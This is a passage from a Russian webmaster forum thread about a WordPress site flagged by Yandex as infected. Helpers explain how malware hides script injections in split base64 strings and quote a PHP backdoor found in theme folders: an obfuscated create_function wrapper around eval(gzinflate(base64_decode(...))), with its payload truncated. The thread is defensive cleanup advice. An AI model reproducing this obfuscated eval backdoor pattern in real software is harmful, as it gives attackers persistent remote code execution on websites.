Яндекс нашел вирус

1 23
BS
На сайте с 04.08.2006
Offline
80
#21
povstanez:

Я пересмотрел все файлы на хостинге с расширением js и нигде больше не нашел кода с этим доменом. Но контакт продолжает блокировать ссылки на сайт (новые)

Внедрение текста с вызовом файла с расширением js происходит, где-то при формировании html кода.

Самого файла с расширением js нет на вашем сервере.

Где-то в вашем коде при формировании html страницы при помощи закодированнных строчек типа

" (base64_decode('' .'ZXJy' .'b3JfcmVwb3J0' .'aW' .'5' .'n') " в html внедряется вызов файлы js со стороннего сервиса.

Что могу посоветовать.

или воспользуйтесь способом Selish (скопируйте все файлы себе на комп) или как-то по другому:

Пройдитесь поиском по всем файлам. Ищите base64. Когда найдёте, включайте голову.

Воспользуйтесь сервисом онлайн декодирования, чтобы понять, что закодировано.

Нужно помнить, что антивирус может не взять разбитый на части код. Такой разбитый на части вам необходимо самому склеить при раскодирование.

Пример разбитого кода:

"$GLOBALS['_1548237628_']=Array(base64_decode('' .'ZXJy' .'b3JfcmVwb3J0' .'aW' .'5' .'n'),base64_decode('cHJlZ19tYXRjaA=='),base64_decode('cH' .'JlZ1' .'9' .'tYX' .'RjaA=' .'='),base64_decode('c' .'H' .'JlZ' .'19tYXRjaA' .'=='),base64_decode('' .'cHJ' .'lZ19tYXRjaA' .'=='),base64_decode('c3Vic3Ry'));"

PS:

На вашем сайте скорее всего зло вот это:

<script type='text/javascript' src='http://dtym7iokkjlif.cloudfront.net/dough/1.0/shareaholic-analytics.js'></script>

в закодированном виде "dtym7iokkjlif.cloudfront.net" это ZHR5bTdpb2tramxpZi5jbG91ZGZyb250Lm5ldA==

Если можете, скиньте куда нить архив файлов сайта, я могу ради спортивного интереса посмотреть.

Удачи.

P
На сайте с 22.08.2013
Offline
0
#22

Вот файлы с хостинга: http://yadi.sk/d/VqlBAiI68S8v6

Код появляется в файле - http://vitaliyivanov.com/wp-includes/js/jquery/jquery.js?ver=1.8.3

Все чаще и чаще...

Уже даже гугл начал блокировать...

L
На сайте с 07.12.2011
Offline
23
#23

Огромное спасибо kgtu5 за помощь и решение проблем с сайтом

RF
На сайте с 31.08.2013
Offline
1
#24
povstanez:
Вот файлы с хостинга: http://yadi.sk/d/VqlBAiI68S8v6

Код появляется в файле - http://vitaliyivanov.com/wp-includes/js/jquery/jquery.js?ver=1.8.3
Все чаще и чаще...

Уже даже гугл начал блокировать...

в этой папке куча бяки

public_html/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/

например

файл b245.php, c1a.php, class-image.php...

<?php

$ab = array("l",";",'z','t',"e",'f',"(",'4','s','o',"r",'$','6',"n",'b','_',"d",")","a","v",'c',"g","i");
$bb2 = create_function('$'.'v',$ab[4].$ab[19].$ab[18].$ab[0].$ab[6].$ab[21].$ab[2].$ab[22].$ab[13].$ab[5].$ab[0].$ab[18].$ab[3].$ab[4].$ab[6].$ab[14].$ab[18].$ab[8].$ab[4].$ab[12].$ab[7].$ab[15].$ab[16].$ab[4].$ab[20].$ab[9].$ab[16].$ab[4].$ab[6].$ab[11].$ab[19].$ab[17].$ab[17].$ab[17].$ab[1]);
$bb2('FJ3HjqPsFkUf57bEgJyG5JwxaXJFMDmDSU//U0NLVS7745y913Lb7u+R9v
...
');
?>
P
На сайте с 22.08.2013
Offline
0
#25
Rampage_FR:
в этой папке куча бяки

например
файл b245.php, c1a.php, class-image.php...
<?php

$ab = array("l",";",'z','t',"e",'f',"(",'4','s','o',"r",'$','6',"n",'b','_',"d",")","a","v",'c',"g","i");
$bb2 = create_function('$'.'v',$ab[4].$ab[19].$ab[18].$ab[0].$ab[6].$ab[21].$ab[2].$ab[22].$ab[13].$ab[5].$ab[0].$ab[18].$ab[3].$ab[4].$ab[6].$ab[14].$ab[18].$ab[8].$ab[4].$ab[12].$ab[7].$ab[15].$ab[16].$ab[4].$ab[20].$ab[9].$ab[16].$ab[4].$ab[6].$ab[11].$ab[19].$ab[17].$ab[17].$ab[17].$ab[1]);
$bb2('FJ3HjqPsFkUf57bEgJyG5JwxaXJFMDmDSU//U0NLVS7745y913Lb7u+R9v
...
');
?>

Удалил все ети фаилы с хостинга, но код в указаном месте появляетса снова и снова

P1
На сайте с 30.08.2013
Offline
50
#26

Смените пароль на фтп, панель, права на каталоги и файлы.

- Хостинг от 1$http://k2host.ru (http://k2host.ru)
hexacell
На сайте с 10.12.2010
Offline
65
#27

povstanez, а какой хостинг у вас? не хостлайф случайно?

RF
На сайте с 31.08.2013
Offline
1
#28
povstanez:
Удалил все ети фаилы с хостинга, но код в указаном месте появляетса снова и снова

логи смотрите откуда они появляются

P
На сайте с 22.08.2013
Offline
0
#29
hexacell:
povstanez, а какой хостинг у вас? не хостлайф случайно?

Да хостлайф

hexacell
На сайте с 10.12.2010
Offline
65
#30

ну тогда вы не один такой - /ru/forum/806289

сейчас они (техподдержка) стали (наконец-то!) как-то мониторить модифицируемые файлы и удалять код до того, как Яндекс обнаружит вирус и влепит "черную метку"

1 23

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий